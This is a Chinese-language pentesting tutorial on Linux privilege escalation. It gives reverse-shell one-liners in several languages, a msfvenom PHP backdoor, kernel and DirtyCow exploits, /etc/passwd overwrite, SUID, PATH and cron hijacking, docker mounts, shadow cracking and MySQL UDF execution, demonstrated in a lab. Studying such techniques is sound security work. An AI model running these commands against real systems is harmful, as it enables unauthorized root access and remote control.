linux提权

kali命令参考60之day13

常用命令

uname -a #查看内核/操作系统/cpu信息 

head -n 1 /etc/issue #查看操作系统版本 

cat /proc/version #查看系统信息 

hostname #查看计算机名 

env #查看环境变量 

ifconfig #查看网卡 

netstat -lntp # 查看所有监听端口 

netstat -antp # 查看所有已经建立的连接 

netstat -s # 查看网络统计信息 

iptables -L #查看防火墙设置 

route -n # 查看路由表 

ps -ef # 查看所有进程 

top # 实时显示进程状态 

w # 查看活动用户 

id # 查看指定用户信息 

last # 查看用户登录日志 

cut -d: -f1 /etc/passwd # 查看系统所有用户 

cut -d: -f1 /etc/group # 查看系统所有组 

crontab -l # 查看当前用户的计划任务 

chkconfig –list # 列出所有系统服务 

chkconfig –list | grep on # 列出所有启动的系统服务 

echo $PATH #查看系统路径

反弹shell命令

一般有一个webshel下，在里面执行反弹shell

nc监听本地端口

nc -lvnp 8888

bash反弹

bash -i >& /dev/tcp/192.168.80.134/8888 0>&1 

bash -c "bash -i >& /dev/tcp/192.168.80.134/8888 0>&1"

nc反弹

nc -e /bin/sh 192.168.2.130 4444 

但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决 

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.80.134 8888 >/tmp/f

python

import socket,subprocess,os 
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(( "192.168.2.130" , 4444 )) 
os.dup2(s.fileno(), 0 ) 
os.dup2(s.fileno(), 1 ) 
os.dup2(s.fileno(), 2 ) 
p = subprocess.call([ "/bin/bash" , "-i" ])

php反弹shell

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby反弹shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

java反弹shell

Runtime.getRuntime() 
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 
p.waitFor()

xterm反弹shell

xterm -display 10.0.0.1:1

一些复现

kali监听8888

bash反弹

执行bash -i >& /dev/tcp/192.168.80.134/8888 0>&1

nc反弹

可看到可执行系统命令，且有nc

这里执行后没有成功反弹

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.80.134 8888 >/tmp/f

我们抓包放到bp，post提交，也失败

将cmd后Ctrl+u编码提交，成功反弹shell

python调用本地shell实现交互式命令行

终端有些时候系统的命令终端不允许直接访问，可以使用python虚拟化一个终端来执行

python -c 'import pty;pty.spawn("/bin/bash")' 

python3 -c 'import pty;pty.spawn("/bin/bash")'

Linux反弹shell解决乱码

为了方便使用，解决shell乱码问题，以便正常tab补充等

kali默认shell为zsh，这里需要bash切换shell

获得shell后，py调用本地shell实现交互式命令行

Ctrl+z放后台

执行

stty -echo raw

fg调用，即可解决乱码

可正常使用tab

Linux内核漏洞提权

通常我们拥有一个webshell的时候，一般权限都是WEB容器权限，如在iis就是iis用户组权限，在apache 就是apache权限，一般都是权限较低，均可执行一些普通命令，如查看当前用户，网络信息，ip信息等。如果我想进行内网渗透就必须将权限提权到最高，如系统权限 超级管理员权限。

内核溢出提权

bash反弹shell，并解决乱码问题，操作不赘述

利用堆栈溢出漏洞

根据当前系统，寻找对应的漏洞的exp，使用exp对其进行提权。

查看当前版本信息

uname -a 

cat /proc/version 

cat /etc/issue 

lsb_release -a 

cat /etc/redhat-release 
有redhat可用

查看版本对应可使用的exp

searchsploit -t 3.19

searchsploit -s 3.19 

searchsploit -x linux/local/37292.c
可查看具体内容

searchsploit -s Linux Kernel 3.13.0

可把exp拿下来

webshell里有gcc，所以可在webshell里进行编译，如果没有的话就需要在本地编译

开启小型服务器

webshell中用wget把exp下载到tmp下

wget http:192.168.80.134/37292.c /tmp/37292.c

用gcc将此文件编译，这里将他叫做exp，也可在桌面gcc编译后wget下载编译好的exp

gcc 37292.c -o exp

exp并没有执行权限，需要赋予权限

执行exp后提权成功

./exp

脏牛提权(CVE-2016-5195)

Linux 内核的内存子系统在处理 写 时拷贝（Copy-on-Write）时，存在条件竞争漏洞， 导致破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后，利用此漏洞获取其他只读内存映射的写权限，进一步获取 root 权限。

exp下载 https://github.com/Brucetg/DirtyCow-EXP

在靶机上创建一个普通用户

adduser xiaosha

下载exp

git clone https://github.com/Brucetg/DirtyCow-EXP

再下载好的文件位置开启小型htttp服务器

把exp放到shell的tmp下

这里exp拉下来发现已经编译过了，就不用gcc再编译了

拉下来还是没有权限执行，增加权限

执行exp

./dirtycow /etc/group "$(sed '/\(sudo*\)/ s/$/,xiaosha/' /etc/group)"

切换为刚才创建的用户 id

可以看到已经加到sudo组里面，已经是一个root权限的用户了

大概思路就是把普通用户加到sudo组里面，相当于普通用户有了root权限

metasploit linux 提权

整体思路跟windows相似

生成反向连接

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.80.134 LPORT=12345 -f raw > msf.php 

生成后开启http小型服务器

使用php中的 file_put_contents函数把后门写入tmp目录，因为这个目录是可写的

file_put_contents('../tmp/m.php',file_get_contents('http://192.168.80.134/msf.php')); 

查看是否写入

system('ls -al ../tmp');

msf进行本地监听

访问tmp下的m.php，即可得到一个session

可以使用模块查询漏洞

run post/multi/recon/local_exploit_suggester

这里没有查询到信息

用shell 使用终端，可执行一些命令

py调用本地shell将他改为交互式

用wget将exp放入tmp内

chmod +x 赋予执行权限

./exp执行提权

大概思路如上

suid提权

SUID是赋予文件的一种权限，它出现在文件拥有者权限的执行位上，此权限下执行时让调用者暂时获得该文件拥有者的权限。

简而言之，如果ROOT用户给某个可执行文件加了S权限，那么该执行程序运行的时候将拥有ROOT权限。

查找所有suid可执行文件的命令

find / -perm -u=s -type f 2>/dev/null 

find / -user root -perm -4000-print2>/dev/null 

find / -user root -perm -4000-exec ls -ldb {} \; 

/表示从文件系统的顶部（根）开始并找到每个目录

-perm 表示搜索随后的权限

-u = s表示查找root用户拥有的文件

-type表示我们正在寻找的文件类型

f 表示常规文件，而不是目录或特殊文件

2表示该进程的第二个文件描述符，即stderr（标准错误）

常见suid提权文件

nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

可在此网站查询suid文件的利用方法

https://gtfobins.github.io/

nc反弹shell

抓包，改post方式，kali监听，bp加参数url编码提交

cmd=system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.80.134 8888 >/tmp/f');

拿到shell，python3调用本地shell改为交互式

查找suid可执行文件，并查找利用方法

可看到文件比较多，

此文件我们可利用，查看权限确实有suid权限

在网站查询利用方法

find . -exec /bin/sh -p \; -quit

拿到root权限

passwd提权

如果passwd文件是可以被修改的，我们可以通过openssl passwd新增一个用户，将其提权为root用户

这里看到此文件只有读取权限没有写权限，我们这里在靶机赋予他所有权限以便我们这次演示

cat读取passwd，在本地创建passwd文件，将靶机passwd文件内容放进去

本地openssl passwd创建用户

openssl passwd -1 -salt xiaoshahack a123456

得到，此处注意.不能忘记

$1$xiaoshah$huYTOWqYxXSnKI8m032HE.

在本地passwd中参照root将创建的用户赋予root权限

xiaoshahack:$1$xiaoshah$huYTOWqYxXSnKI8m032HE.:0:0:/root:/bin/bash

开启httpserver服务，在shell中用wget下载覆盖passwd

wget http://192.168.80.134/passwd -O /etc/passwd

shell中cat此文件，发现已经被修改

切换创建用户，即可得到root权限

也可使用ssh连接

ssh xiaoshahack@192.168.80.142

ssh密钥提权

拿到一个反弹shell后

将passwd中的bash过滤出来

cat /etc/passwd | grep bash

拿到了一些信息，我们看其中有一些主目录，我们尝试看是否可访问这些主目录

查看目录

看到了ssh目录，查看.ssh是否可读

看到也是可读的

存在author这个文件，author和pub这俩个文件md5值相同

所以我们可以把id_rsa这个文件下载下来，修改后，通过修改后的密钥登录

id_rsa就是这个用户登录的私钥

下载并赋予id_rsa文件600权限

通过此密钥登录

ssh -i id_rsa web1@192.168.80.142

可看到成功登录了

通过一些方式提权

这里权限比较低，之后我们可以看那些地方可提权，比如docker

环境劫持提权

前提条件：

1. 存在带有suid的文件
2. suid文件中有系统命令

寻找suid文件，命令在suid提权写了

这里有一个脚本文件，我们运行这个文件看它是干什么的

运行此文件

我们发现它是一个查询进程的命令，里面肯定是用了ps命令，到此我们可确定此文件是我们要找的文件，满足俩个条件

如果此文件不可读，我们可使用命令进一步确定是否有ps命令

xxd /script/shell | grep ps

接下来思路是：把tmp路径加到当前环境变量，这样在访问/script/shell文件时，会优先执行tmp下的ps文件作为命令，不会执行原本文件里的，达到劫持效果

而tmp下的文件是我们精心准备的，达到提权效果

cd /tmp
echo "/bin/bash" >ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
/script/shell

可以看到提权成功了

john破解shadow root密文

如果shadow文件可读，一般不可读，我们可以用john来破解其中的root密文，以此得到密码，就可以登录root用户了

先解压john的字典

gzip -d /usr/share/wordlists/rockyou.txt.gz  

把root密文放到一个文件，用john解密

john --wordlist="/usr/share/wordlists/rockyou.txt" root

可以看到破解了密文，可以进行登录了

Ubuntu计划任务反弹shell提权

在root用户下，查看此目录/var/spool/cron/crontabs/root或crontab -l

查看日志文件

tail -f /var/log/syslog

这里发现它反复执行cleanup.py文件

我们可以把此文件的内容修改，bash反弹shell，这样就在root下反弹shell，就会得到root的shell

在root下查看此文件发现此文件时任何用户可读可写的

我们在普通用户下修改 文件

此文件是以root用户身份执行的，所以我们让它反弹shell，得到的也会是root权限

bash -i >& /dev/tcp/192.168.80.134/6666 0>&1

import os
import sys
try:
    os.system('rm -r /home/web1/cleanup/*')
except:
    sys.exit()

监听，执行

tail -f /var/log/syslog

拿到root权限

提权脚本使用

LinEnum

https://github.com/rebootuser/LinEnum

下载并执行

wget -O - http://192.168.80.134/LinEnum.sh | bash

可拿到很多东西，版本信息、敏感文件等等

linuxprivchecker

python2版本

https://github.com/sleventyeleven/linuxprivchecker

python3版本

https://github.com/swarley7/linuxprivchecker

wget拉取，执行

python3 linuxprivchecker.py

也会获得很多信息

linux-exploit-suggester2

https://github.com/jondonas/linux-exploit-suggester-2

自动检测

perl linux-exploit-suggester-2.pl -k 版本

docker提权

docker是一个容器，可以在一台机子下虚拟多台服务，比如在linux下虚拟一个linux

拿到一个反弹shell可以 id 或 groups查看是否有docker组

比如我们在ssh提权中登入一个用户发现了docker，就可以进行docker提权

思路就是把docker的目录挂载到宿主根目录，即可拿到root权限

docker run -v /:/mnt -it alpine

进入docker的mnt下就是宿主的根目录，这里的alpine会自动在网上查找下载

sudo提权

sudo 是一种权限管理机制，管理员可授权普通用户在不知道root密码情况下去执行一些 root 执行的操作。

首先通过信息收集，查看是否存在sudo配置不当的可能。如果存在，寻找低权限sudo用户的密码，进而提权。

通常运维会将一些需要 sudo的命令集成到某个用户或者某个组，然后在/etc/sudoers文件内进行设置

可设置 chmod +w cat /etc/sudoers 使用vi对其编辑 保存即可

一个思路：

当我们登入一些普通用户，可以sudo -l 列出可执行的命令

可看到我们在sudo下可以执行cat命令

可读取shadow文件

拿到一些密文可进行解密，比如root的密文

mysql udf提权

在windows我们也说过这种方法

这总方法成功率不大，因为限制条件比较多

失败的原因：

1. plugin 不存在 或者 没权限写入文件

2. udf so文件 版本不对

3. 设置了权限

   sudo ln -s /etc/apparmor.d/usr.sbin.mysqld /etc/apparmor.d/disable/
   
   sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld

拿到反弹shell后，mysql –version查看是否有mysql

假如此时知道账号密码 登入 ，查看是否有插件文件夹

show variables like '%plugin%';

查看此路径目录权限，是否有写权限

在sqlmap此路径下存在此文件，这个文件是编译过的

/usr/share/sqlmap/data/udf/mysql/linux/64/

我们将此文件解码后wget到plung目录下

cd /usr/share/sqlmap/extra/cloak/ 
进入此目录下
sudo python cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ lib_mysqludf_sys.so 
使用cloak.py进行解码
cp /usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ ~/Desktop 
将解码后的文件拿到桌面
wget http://192.168.80.134/lib_mysqludf_sys.so
在pllung中拿此文件

登入mysql，创建函数

create function sys_eval returns string soname "lib_mysqludf_sys.so";

使用创建函数执行命令

select sys_eval('id');

一个思路

切换用户

登入一个用户下，我们在tmp下建立1.c

#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
int main(int argc,char *argv[]) 
{
setreuid(1001,1001); 
execve("/bin/sh",NULL,NULL); 
}

用gcc编译

gcc 1.c -o 1

加suid

chmod u+s 1

加了suid之后其他用户就可以调用

./1运行，可bash切换到bashshell

运行后即可执行1001这个用户id的sudo cat命令